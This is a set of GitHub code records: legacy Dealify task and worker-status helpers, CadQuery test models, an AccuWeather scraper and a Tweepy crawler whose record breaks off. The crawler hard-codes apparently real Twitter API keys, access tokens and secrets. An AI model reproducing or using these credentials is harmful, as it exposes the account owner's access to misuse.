SEARCH_CONFIG_CL_CONFIG_KEY_NAME, SEARCH_CONFIG_PRICE_RESTRICTION_KEY_NAME, SEARCH_CONFIG_LOCATION_RESTRICTION_KEY_NAME\nfrom dealify_utils import log, log_debug, log_error, log_messages\nfrom database_helpers import set_dormant_dealify_search, set_overdue_craigslist_queries, read_new_dealify_search_ids, read_dealify_search_by_search_id, update_dealify_worker_status\nfrom task_map import map_task, map_task_config\nimport json\nfrom craigslist_helpers import work_overdue_craigslist_queries, create_craigslist_queries\n\n\n# Legacy, Gross. Functionality now built into validate_task_config\ndef get_default_search_task_config(task):\n if not task.task_type:\n log_error(\n log_messages().search_worker.error_default_task_config_none_task_type)\n return None\n if task.task_type not in [task_type.value for task_type in DealifySearchTaskTypes]:\n log_data = f\"Task Type: {task.task_type}\"\n log_error(log_messages().search_worker.error_default_task_config_unfamiliar_task_type, data=log_data\n )\n return None\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n return CraigslistOverdueSearchTaskConfig()\n\n\n# Legacy, Gross. Use validate_dealify_task instead w/ task_config_map\ndef validate_search_task_config(task):\n if not task.task_config:\n get_default_search_task_config(task)\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n try:\n task_config = CraigslistOverdueSearchTaskConfig(\n **json.loads(task.task_config))\n return task_config\n except ValidationError as ve:\n log_error(\n log_messages().search_worker.error_validate_task_config_ve, ve.json())\n return None\n\n\n# Legacy, Gross. Use run_dealify_task w/ task_map\nasync def execute_dealify_search_task(task, conn):\n if task.task_type not in [task_type.value for task_type in DealifySearchTaskTypes]:\n log_data = f\"Task Type: {task.task_type}\"\n log_error(log_messages(\n ).search_worker.error_execute_search_task_unfamiliar_task_type, log_data)\n return None\n log_data = f\"Task ID: {task.task_id}\"\n log(log_messages().search_worker.log_execute_search_task_started, log_data)\n task_config = validate_search_task_config(task)\n if not task_config:\n log_error(\n log_messages().search_worker.error_validate_task_config_no_task_config)\n return None\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n\n log_data = f\"Task ID: {task.task_id}\"\n log(log_messages().search_worker.log_execute_search_task_started, log_data)\n await work_overdue_craigslist_queries(conn, **task_config.dict(exclude_unset=True))\n elif task.task_type == DealifySearchTaskTypes.SetOverdueCraigslistQueries.value:\n await set_overdue_craigslist_queries(conn)\n log(log_messages().search_worker.log_execute_search_task_finished, log_data)\n return True\n\n\ndef validate_task_config(task):\n\n task_config_base = map_task_config(task.task_type)\n if not task_config_base:\n log_error(\n log_messages().search_worker.error_value_is_none.format(value='Task Config'))\n return None\n if not task.task_config:\n log(\"No Custom Task Config Specified, Using Default\")\n return task_config_base() # If no custom task_config specified with task, use Default\n try:\n task_config = task_config_base(**json.loads(task.task_config))\n log(f\"Task Config Validated Successfully\")\n return task_config\n except ValidationError as ve:\n log_error(\n log_messages().search_worker.error_validate_task_config_ve, data=ve.json())\n return task_config_base()\n\n\nasync def run_dealify_task(task, conn):\n task_func = map_task(task.task_type)\n if not task_func:\n log_error(\n log_messages().search_worker.error_execute_search_task_unfamiliar_task_type)\n return None\n task_config = validate_task_config(task)\n if task_config:\n await task_func(conn, **task_config.dict(exclude_unset=True))\n else:\n await task_func(conn)\n log(log_messages().search_worker.log_execute_search_task_finished)\n return True\n\n\ndef start_logger(log_level=WORKER_LOG_LEVEL, dev=DEV_MODE):\n logging.basicConfig(level=log_level,\n filename=WORKER_LOG_FILE,\n filemode='w')\n root_logger = logging.getLogger()\n fh = logging.FileHandler(WORKER_LOG_FILE)\n root_logger.addHandler(fh)\n if dev:\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n formatter = logging.Formatter(WORKER_LOG_FORMAT)\n ch.setFormatter(formatter)\n root_logger.addHandler(ch)\n base_logger = logging.getLogger(BASE_LOGGER_NAME)\n return base_logger\n\n\nasync def set_worker_status(worker, new_status, conn):\n log_enum_name = DealifyWorkerStatus.__name__\n if new_status not in [status.value for status in DealifyWorkerStatus]:\n log_error(\n log_messages().search_worker.error_enum_unfamiliar_type.format(enum_name=log_enum_name, new_value=new_status))\n return False\n\n if new_status == DealifyWorkerStatus.Error.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Error.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n if worker.worker_status == DealifyWorkerStatus.Killed.value:\n if new_status == DealifyWorkerStatus.Dormont.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Dormont.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(\n enum_name=enum_name, new_value=new_status, old_value=worker.worker_status))\n return False\n\n if new_status == DealifyWorkerStatus.Dormont.value:\n if worker.worker_status == DealifyWorkerStatus.Running.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Dormont.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(enum_name=log_enum_name,\n new_value=new_status, old_value=worker.worker_status))\n elif new_status == DealifyWorkerStatus.Running.value:\n if worker.worker_status == DealifyWorkerStatus.Started.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Running.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n elif new_status == DealifyWorkerStatus.Started.value:\n if worker.worker_status == DealifyWorkerStatus.Dormont.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Started.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n elif new_status == DealifyWorkerStatus.Killed.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Killed.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n else:\n log_error(log_messages().search_worker.error_enum_invalid_option.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return False\n", "repo_name": "Kroonjay/Dealify", "sub_path": "legacy/dealify_helpers.py", "file_name": "dealify_helpers.py", "file_ext": "py", "file_size_in_byte": 8878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dealify_utils.log_error", "line_number": 15, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 16, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 18, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 20, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 20, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 23, "usage_type": "name"}, {"api_name": "models.CraigslistOverdueSearchTaskConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 31, "usage_type": "name"}, {"api_name": "models.CraigslistOverdueSearchTaskConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "pydantic.ValidationError", "line_number": 36, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 37, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 38, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 44, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 46, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 46, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 50, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 50, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 53, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 54, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 56, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 59, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 59, "usage_type": "call"}, {"api_name": "craigslist_helpers.work_overdue_craigslist_queries", "line_number": 60, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SetOverdueCraigslistQueries", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 61, "usage_type": "name"}, {"api_name": "database_helpers.set_overdue_craigslist_queries", "line_number": 62, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 63, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 63, "usage_type": "call"}, {"api_name": "task_map.map_task_config", "line_number": 69, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 71, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 72, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 79, "usage_type": "call"}, {"api_name": "pydantic.ValidationError", "line_number": 81, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 82, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 83, "usage_type": "call"}, {"api_name": "task_map.map_task", "line_number": 88, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 90, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 91, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 98, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 98, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_LEVEL", "line_number": 102, "usage_type": "name"}, {"api_name": "config.DEV_MODE", "line_number": 102, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FILE", "line_number": 104, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 107, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FILE", "line_number": 107, "usage_type": "argument"}, {"api_name": "logging.StreamHandler", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 112, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FORMAT", "line_number": 112, "usage_type": "argument"}, {"api_name": "logging.getLogger", "line_number": 115, "usage_type": "call"}, {"api_name": "config.BASE_LOGGER_NAME", "line_number": 115, "usage_type": "argument"}, {"api_name": "models.DealifyWorkerStatus.__name__", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 120, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 121, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 122, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 123, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Error", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 126, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 127, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Error", "line_number": 127, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 127, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 128, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 128, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 132, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 133, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 134, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 134, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 135, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 135, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 140, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 140, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 144, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 145, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 146, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 146, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 147, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 147, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 152, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 152, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 154, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 155, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 156, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 156, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 157, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 157, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 161, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 161, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 163, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 164, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 165, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 165, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 165, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 166, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 166, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 169, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 169, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 170, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 170, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 170, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 171, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 171, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 175, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "1449793297", "text": "#!/usr/bin/env python3\n\n# referred to https://cadquery.readthedocs.io/en/latest/assy.html\n\nimport cadquery as cq\n\n\ndef book_model():\n book_length = 10\n book_width = 8\n book_thickness = 1\n spine_thickness = 0.8\n assy = cq.Assembly()\n\n book_body = cq.Workplane(\"XY\").box(book_length, book_width, book_thickness)\n\n spine = (\n cq.Workplane(\"XY\")\n .box(\n book_length, spine_thickness, book_thickness + 0.2\n ) # Making spine slightly larger\n .translate((0, book_width / 2 - spine_thickness / 2, 0))\n )\n\n assy.add(book_body, name=\"book_body\")\n assy.add(spine, name=\"spine\")\n return assy\n\n\ndef torch_model():\n flame = cq.Solid.makeCone(2, 0, 5).translate((0, 0, 2))\n assy = cq.Assembly()\n\n assy.add(flame, name=\"flame\")\n assy.add(\n cq.Solid.makeCone(2, 1, 15),\n loc=cq.Location((0, 0, 0), (1, 0, 0), 180),\n name=\"handle\",\n )\n assy.add(\n cq.Solid.makeCone(3.5, 2.5, 2).translate((0, 0, -2)),\n loc=cq.Location((0, 0, 0), (1, 0, 0), 180),\n name=\"middle\",\n )\n return assy\n\n\ndef desk_model():\n desk_top_length = 10\n desk_top_width = 8\n desk_top_thickness = 1\n\n leg_length = 6\n leg_width = 1\n\n assy = cq.Assembly()\n desk_top = cq.Workplane(\"XY\").box(\n desk_top_length, desk_top_width, desk_top_thickness\n )\n\n def create_leg(x, y):\n return (\n cq.Workplane(\"XY\")\n .box(leg_width, leg_width, leg_length)\n .translate((x, y, leg_length / 2 + desk_top_thickness / 2))\n )\n\n legs = [\n create_leg(\n desk_top_length / 2 - leg_width / 2, desk_top_width / 2 - leg_width / 2\n ),\n create_leg(\n -desk_top_length / 2 + leg_width / 2, desk_top_width / 2 - leg_width / 2\n ),\n create_leg(\n desk_top_length / 2 - leg_width / 2, -desk_top_width / 2 + leg_width / 2\n ),\n create_leg(\n -desk_top_length / 2 + leg_width / 2, -desk_top_width / 2 + leg_width / 2\n ),\n ]\n\n assy.add(desk_top, name=\"desk_top\")\n for i in range(4):\n assy.add(legs[i], loc=cq.Location((0, 0, 0), (1, 0, 0), 180), name=f\"leg{i}\")\n return assy\n\n\nMODELS = {\"book\": book_model, \"torch\": torch_model, \"desk\": desk_model}\n\nif __name__ == \"__main__\":\n import argparse\n\n p = argparse.ArgumentParser(description=\"Export STEP models to files\")\n p.add_argument(\"model\", choices=MODELS.keys(), help=\"Model to export\")\n p.add_argument(\"output\", help=\"Output STEP file\")\n\n args = p.parse_args()\n\n modfn = MODELS[args.model]\n assy = modfn()\n assy.save(args.output)\n", "repo_name": "sree314/stepcvt", "sub_path": "tests/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cadquery.Assembly", "line_number": 13, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 15, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 18, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 31, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cadquery.Assembly", "line_number": 32, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 36, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cadquery.Location", "line_number": 37, "usage_type": "call"}, {"api_name": "cadquery.Solid.makeCone", "line_number": 41, "usage_type": "call"}, {"api_name": "cadquery.Solid", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cadquery.Location", "line_number": 42, "usage_type": "call"}, {"api_name": "cadquery.Assembly", "line_number": 56, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 57, "usage_type": "call"}, {"api_name": "cadquery.Workplane", "line_number": 63, "usage_type": "call"}, {"api_name": "cadquery.Location", "line_number": 85, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "20060442498", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nimport random\nimport time\nimport logging\nimport traceback\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\nheaders = {'Accept': '*/*',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 '\n 'Safari/537.36',\n 'Connection': 'keep-alive'}\n\n\ncity_url = {\"ld\": \"https://www.accuweather.com/zh/gb/london/ec4a-2/hourly-weather-forecast/328328?hour=%s\",\n \"bj\": \"https://www.accuweather.com/zh/cn/beijing/101924/hourly-weather-forecast/101924?hour=%s\"}\n\n\ndef get_data(hour, city='bj'):\n \"\"\"\n\tget the weather forecast data in the next eight hours\n\n\tParameters\n\t----------\n\thour: int\n\t\tcurrent hour + how many hours between current hour and the target hour you want\n\t\te.g. now is 11:00:00, you want 18:00:00, the variable hour should be 18\n\t\t\t if you want 18:00:00 tomorrow, the variable hour should be 42\n\n\tReturns\n\t----------\n\tdata: list\n\t\teach element contains one feature of weather data, like\n\t\t\t['温度', '16°', '17°', '18°', '19°', '20°', '19°', '18°', '17°']\n :param hour:\n :param city:\n\n\t\"\"\"\n url = city_url[city] % hour\n logger.debug('fetch url: %s' % url)\n r = requests.get(url, headers=headers)\n soup = BeautifulSoup(r.text, 'lxml')\n data = [i for d in soup.find_all(class_='hourly-table') for i in d.stripped_strings]\n data = [data[i: i + 9] for i in range(len(data)) if i % 9 == 0][:-2]\n return data\n\n\ndef parse_data(data, timestamp):\n \"\"\"\n\tparse the data got from the function get_data(hour)\n\n\tParameters\n\t----------\n\tdata: list\n\t\tlist from function get_data(hour)\n\n\ttimestamp: datetime.datetime\n\t\tthe datetime of the first element in variable data\n\n\tReturns\n\t----------\n\tresults: dict\n\t\tall weather forecast date from the timestamp as beginning to the eight hours later\n\t\"\"\"\n results = []\n t = [[i[index] for i in data[1:]] for index in range(1, 9)]\n columns = [i[0] for i in data[1:]]\n for index in range(len(t)):\n delta = timedelta(hours=index)\n r = dict(zip(columns, t[index]))\n r['时间'] = datetime.strftime(timestamp + delta, '%Y-%m-%d %H:00:00')\n del r['降水']\n del r['天空']\n results.append(r)\n return results\n\n\ndef get_batch_data(now, city='bj'):\n \"\"\"\n\tget two days weather forecast data from now on\n\tParameters\n\t----------\n\tnow: datetime.datetime\n\t\tnow time\n\n\tReturns\n\t----------\n\tdata: str\n\t\tjson string ends with '\\n'\n\t\"\"\"\n global delta\n results = []\n for i in range(7):\n delta = timedelta(hours=i * 8)\n\n data = get_data(now.hour + i * 8, city)\n logger.info('got data of %s' % (datetime.strftime(now + delta, '%Y-%m-%d %H:00:00')))\n results.extend(parse_data(data, now + delta))\n\n time.sleep(random.uniform(0, 3))\n\n if len(results) != 56:\n logger.warning(\n 'there maybe something wrong with data length of %s' % datetime.strftime(now + delta, '%Y-%m-%d %H:00:00'))\n\n data = json.dumps({'time': datetime.strftime(now, '%Y-%m-%d %H:00:00'), 'data': results}) + '\\n'\n logger.info('got data successfully!')\n return data\n\n\ndef insert_data_into_file(data, filename='data_ld.txt'):\n \"\"\"\n\tinsert json string into file\n\n\tParameters\n\t----------\n\tdata: str\n\t\tthe json string from the function get_batch_data(now)\n\n\tfilename: str\n which file you want to save the data\n\t\"\"\"\n with open(filename, 'w') as f:\n f.write(data)\n logger.info('insert data info file successfully!')\n\n\ndef fetch(city='bj'):\n \"\"\"\n\tfetch the data and save them into a file\n\t\"\"\"\n now = datetime.now()\n logger.info('start fetching weather data at %s' % (datetime.strftime(now, '%Y-%m-%d %H:%M:%S')))\n insert_data_into_file(get_batch_data(now, city),\n filename=\"data/{}_{}.txt\".format(city, datetime.strftime(now, '%m_%d_%H')))\n\n\nif __name__ == '__main__':\n while True:\n retry_times = 0\n success = False\n while retry_times < 10:\n if success:\n break\n try:\n fetch(city=\"bj\")\n fetch(city=\"ld\")\n success = True\n except Exception as e:\n logger.error(e)\n traceback.print_exc(file=open('traceback_ld.txt', 'a'))\n retry_times += 1\n time.sleep(30)\n else:\n logger.error('program has fatal error!')\n time.sleep(1800)\n", "repo_name": "Logan-Lin/KDD_Data_process_NG", "sub_path": "forecast/weather_forecast.py", "file_name": "weather_forecast.py", "file_ext": "py", "file_size_in_byte": 4656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 138, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 141, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 141, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 157, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 159, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}]} +{"seq_id": "40154438591", "text": "import time\nimport tweepy\nfrom sentiment.models import Tweet\n\ndef crawl_tweet(input_query):\n access_token = \"3221004481-HdKucoOhc3D8vtVHHhzx6r39wBM5k9Il5CHm7bI\"\n access_token_secret = \"4LWYCLTcngX2M6fBznA9w88FDLZGR1rA4lcbKXmgdX6GX\"\n api_key = \"XjAWG9nyEJ4d88bvRkC8phix9\"\n api_key_secret = \"xSmszxt2ZDoEJ27mVzYiHKmeA3XCB1YZjPYAIJYjfXIHEKiLbS\"\n\n auth = tweepy.OAuthHandler(api_key, api_key_secret)\n auth.set_access_token(access_token,access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n \n crawlTweets = []\n\n for tweet in tweepy.Cursor(api.search_tweets,q=input_query,count=15,lang=\"id\").items():\n tweets = {\n 'tweet_id':tweet.id,\n 'created_at':tweet.created_at,\n 'user_name':tweet.user.screen_name,\n 'text':tweet.text.encode(\"utf-8\"),\n }\n crawlTweets.append(tweets)\n \n\n return crawlTweets\n\nclass MyStreamListener(tweepy.Stream):\n \n def __init__(self, time_limit=300):\n self.start_time = time.time()\n self.limit = time_limit\n super(MyStreamListener, self).__init__()\n \n def on_connect(self):\n print(\"Connected to Twitter API.\")\n \n def on_status(self, status):\n \n res = {}\n # Tweet ID\n tweet_id = status.id\n \n # User ID\n user_id = status.user.id\n # Username\n username = status.user.name\n \n \n # Tweet\n if status.truncated == True:\n tweet = status.extended_tweet['full_text']\n hashtags = status.extended_tweet['entities']['hashtags']\n else:\n tweet = status.text\n hashtags = status.entities['hashtags']\n \n # Read hastags\n # hashtags = read_hashtags(hashtags) \n \n # Retweet count\n # retweet_count = status.retweet_count\n # Language\n lang = status.lang\n \n print(status.text)\n # If tweet is not a retweet and tweet is in English\n # if not hasattr(status, \"retweeted_status\") and lang==\"id\":\n # Connect to database\n # dbConnect(user_id, username, tweet_id, tweet, retweet_count, hashtags)\n # tweet = {\n # 'tweet_id':status.id,\n # # 'created_at':status.created_at,\n # 'user_name':status.user.screen_name,\n # 'text':status.text.encode(\"utf-8\"),\n # }\n # res.append(tweet)\n # Tweet.objects.bulk_create(res)\n \n \n if (time.time() - self.start_time) > self.limit:\n \n print(time.time(), self.start_time, self.limit)\n return False\n \n def on_error(self, status_code):\n if status_code == 420:\n # Returning False in on_data disconnects the stream\n return False", "repo_name": "alvinrrizky/Sentigovt24", "sub_path": "sentiment/crawl.py", "file_name": "crawl.py", "file_ext": "py", "file_size_in_byte": 2858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 13, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 17, "usage_type": "call"}, {"api_name": 